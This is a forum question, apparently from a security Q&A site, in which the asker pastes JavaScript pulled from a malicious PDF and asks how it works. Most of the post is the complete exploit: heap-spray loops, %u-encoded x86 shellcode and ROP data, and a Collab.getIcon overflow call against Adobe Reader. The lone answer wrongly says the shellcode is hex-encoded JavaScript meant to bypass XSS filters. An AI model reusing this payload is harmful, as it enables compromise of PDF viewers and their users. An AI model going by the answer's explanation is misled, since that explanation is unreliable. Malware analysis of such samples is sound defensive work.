# Deobfuscating Javascript Code in a Malicious PDF

Tags: malware, javascript, pdf

I'm currently working on a project to look at how PDFs are infected, and what the malicious code found in these documents do.

The malicious code is obfuscated, and I've tried a variety of methods but I just can't seem to get anything working and haven't been able to deobfuscate it so far.

I've been using Peepdf to extract the javascript code, and I have been trying to analyze it, but haven't found much success.

The code is given below:

```
var sc

for (i = 0; i < 18000; i++)
    sc = sc + 0x60
var sc1
for (i = 0; i < 18000; i++)
    sc1 = sc1 + 0x60
var sc2
for (i = 0; i < 18000; i++)
    sc2 = sc2 + 0x60
for (i = 0; i < 18000; i++)
    var sc3
sc3 = sc3 + 0x60
var sc4
for (i = 0; i < 18000; i++)
    sc4 = sc4 + 0x60


var strTempA = "byteToChar";
var strTempB = "getIcon";
var strTempC = "collectEmailInfo";

function rep(count, what) {
    var v = "";
    while (--count >= 0) v += what;
    return v;
}

function myunes(buf) {
    var ret = ""
    for (var x = 0; x < buf["length"]; x += 2) {
    ret = ret + util[strTempA](Number("0x" + buf["substr"](x, 2))); 
    }
    return ret;
}

sc = "%u0c0C%u11eB%u5bfc%u334b%u66c9%u2eb9%u8003%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f)%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d%u064f%ud065%ud2d1%u4dd4%u8f87";

function exp8() {
    blah = rep(128, unescape("%u4242%u4242%u4242%u4242%u4242")) + sc;
    bbk = unescape("%u4242%u4242");
    var h = "getIcon";
    wap = 0x24 + blah["length"]

    while (bbk["length"] < wap) 
           bbk += bbk;

    fillbk = bbk["substring"](0, wap);
    bk = bbk["substring"](0, bbk["length"] - wap);

    while (bk["length"] + wap < 262144)
           bk = bk + bk + fillbk;
    mm = new Array() //jf;afkla'[
    for (i = 0; i < 350; i++) 
           mm[i] = bk + blah;

    of = rep(4096, myunes("0a0a0a0a"));
    var a = ["_N.bundle"]; //next time
    var b = 5; //shlshgl

    Collab[h](of + a[b - b]) //ajf[pa';[
}

if (app.viewerVersion >= 9.00) //glwgjwpjp]';"
{   
    var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
    for (i = 0; i < 18000; i++)
    TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ + 0x70;


    var scdt1 = "%u0C0C%u0C0C%u1062%u4a80%u4141%u4141%u6e6a%u4a80%u63a5%u4a80%u0000%u4a8a%u1062%u4a80%u4141%u4141%u1eba%u4a81%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%u21b2%u4a80%uffff%uffff%uffff%uffff%u1000%u0000";

    var scdt2 = "%u0C0C%u0C0C%u4919%u0700%u12bb%u0700%u1022%u0700%u0C0C%u0C0C%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700   %ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090  %u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700";

    var scdtreal = "%u38e8%u0000%uad00%u7d9b%uacdf%uda08%u1676%ufa65%uec10%u0397%ufb0c%ufd97%u330f%u8aca%uea5b%u8a49%ud9e8%u238a%u98e9%u8afe%u700e%uef73%uf636%ub922%ue67c%u8f17%u837b%ub5b9%u0478%u3249%u5bd3%u8955%u81e5%u48ec%u0002%u8900%ufc5d%u306a%u6459%u018b%u408b%u8b0c%u1c70%u8bad%u0858%u8b53%ufc7d%u77ff%ue834%u02ba%u0000%u4789%u3134%u50c0%u6568%u336c%u6832%u656b%u6e72%ue089%uff50%u3457%uc389%u0d6a%u8b59%ufc7d%u5351%u74ff%ufc8f%u91e8%u0002%u5900%u4489%ufc8f%ueee2%u016a%u8d5e%uf445%u5650%u078b%ud0ff%u4589%u3df0%uffff%uffff%u0475%u5646%ue8eb%u003d%u0020%u7700%u4604%ueb56%u6add%u6a00%u6800%u1200%u0000%u8b56%u0447%ud0ff%u006a%u458d%u50ec%u086a%u458d%u50b8%u8b56%u0847%ud0ff%uc085%u0475%u5646%ub4eb%u7d81%u50b8%u5064%u7444%u4604%ueb56%u81a7%ubc7d%ufeef%uaeea%u0474%u5646%u9aeb%u75ff%u6af0%uff40%u0c57%u4589%u85d8%u75c0%ue905%u0205%u0000%u006a%u006a%u006a%uff56%u0457%u006a%u458d%u50ec%u75ff%ufff0%ud875%uff56%u0857%uc085%u0575%ue2e9%u0001%u5600%u57ff%u8b10%ud85d%u838b%u1210%u0000%u4589%u8be8%u1483%u0012%u8900%ue445%u838b%u1218%u0000%u4589%u03e0%ue445%u4503%u89e8%udc45%u8a48%u0394%u121c%u0000%uc230%u9488%u1c03%u0012%u8500%u77c0%u8deb%ub885%ufffe%u50ff%uf868%u0000%uff00%u1457%ubb8d%u121c%u0000%uc981%uffff%uffff%uc031%uaef2%ud1f7%ucf29%ufe89%uca89%ubd8d%ufeb8%uffff%uc981%uffff%uffff%uaef2%u894f%uf3d1%u6aa4%u8d02%ub885%ufffe%u50ff%u7d8b%ufffc%u1857%uff3d%uffff%u75ff%ue905%u014d%u0000%u4589%u89c8%uffc2%ue875%u838d%u121c%u0000%u4503%u50e0%ub952%u0100%u0000%u548a%ufe48%u748a%uff48%u7488%ufe48%u5488%uff48%ueee2%u57ff%uff1c%uc875%u57ff%u8d10%ub885%ufffe%ue8ff%u0000%u0000%u0481%u1024%u0000%u6a00%u5000%u77ff%uff24%u2067%u57ff%u8924%ud045%uc689%uc789%uc981%uffff%uffff%uc031%uaef2%ud1f7%u8949%ucc4d%ubd8d%ufeb8%uffff%u0488%u490f%u048a%u3c0e%u7522%u491f%u048a%u3c0e%u7422%u8807%u0f44%u4901%uf2eb%ucf01%uc781%u0002%u0000%u7d89%ue9c0%u0013%u0000%u048a%u3c0e%u7420%u8806%u0f04%ueb49%u01f3%u47cf%u7d89%uffc0%uf075%u406a%u558b%ufffc%u0c52%u4589%u89d4%u8bc7%ue875%u7503%u01e0%u81de%u1cc6%u0012%u8b00%ue44d%ua4f3%u7d8b%u6afc%uff00%uc075%u57ff%u8918%uc445%uff3d%uffff%u74ff%u576a%uc389%u75ff%ufff0%ud475%uff50%u1c57%uff53%u1057%u7d8b%u81c0%uffc9%uffff%u31ff%uf2c0%uf7ae%u29d1%u89cf%u8dfe%ub8bd%ufffd%uc7ff%u6307%u646d%uc72e%u0447%u7865%u2065%u47c7%u2f08%u2063%u8122%u0cc7%u0000%uf300%u4fa4%u07c6%u4722%u07c6%u5f00%u858d%ufdb8%uffff%u00e8%u0000%u8100%u2404%u0010%u0000%u006a%uff50%u2477%u67ff%uff20%u2c57%u006a%uff50%u3057%u5553%u5756%u6c8b%u1824%u458b%u8b3c%u0554%u0178%u8bea%u184a%u5a8b%u0120%ue3eb%u4932%u348b%u018b%u31ee%ufcff%uc031%u38ac%u74e0%uc107%u0dcf%uc701%uf2eb%u7c3b%u1424%ue175%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%uebe8%u3102%u89c0%u5fea%u5d5e%uc25b%u0008"

    if (app.viewerType == "Exchange-Pro") {     
      var TCfIpiOxOYTTeNgDQsDQaDtVjQ = unescape(scdt2 + scdtreal);
    } 
    else {
    var TCfIpiOxOYTTeNgDQsDQaDtVjQ = unescape(scdt1 + scdtreal);
    }

    var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = unescape("%u0C0C%u0C0C");

    while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["length"] + 28 < 65536)
    XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;

    KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["substring"](0, (3084 - 36) / 2);
    KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
    KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
    KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["substring"](0, 65536 / 2);

    while (KoHQQkRIckZJKtdlKTGyUUS["length"] < 524288)
    KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;

    bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["substring"](0, 524288 - 4120 / 2); 
    //ashlfajl;afj

    var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array() //ip[wo][]l;
    for (tYzswEF = 0; tYzswEF < 496; tYzswEF++)
    JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF] = bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz + "s";
    //shklfh
    //ahf;lajf;
} else {
    exp8();

}
```

When I try running it on the browser it throws errors saying "util" is not defined or "Collab" is not defined.

I would like to know how to decode this, or get any help in that direction.

EDIT1: Based on a little more research, I think this might be in its deobfuscated form already, since the shell code is readily available in this case. If this is true, I would really appreciate it if someone could explain what this code is doing. Does unescape execute the Shell code you pass to it? Or is that done by some other part? To the best of my knowledge, that is supposed to be done by eval() or something of the sort, but here, I can't tell if there is an eval() statement or not. Plus, I noticed in the code, that nowhere is the Shell code actually being used. So I'm really confused as to how it's being executed. Any help would be greatly appreciated.

Answer (score 1):

Looking over the code it doesn't appear to be obfuscated, however things like `sc = %u0c0C%u11eB%u5bfc%u334b%u66c9%u2eb9%u8003%u0b34%ue28f%uebfa%ue805%....` are just hex encoded versions of traditional JS, it is used mainly to bypass filters that remove tags like `<alert>, <img>`, etc.

Something like `<script>alert("Hi");</script>`can be encoded as `%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e`

i'd recommend using a decoder and converting these values into text to get a better idea of what is happening

Comment: Do you have any recommendation for a decoder? 
I managed to convert the shellcode to an executable. I then debugged it using Olly Debug, but trying to understand the Assembly code on my own is quite difficult. So by decoder do you mean a disassembler like Olly Debug, or some other tool?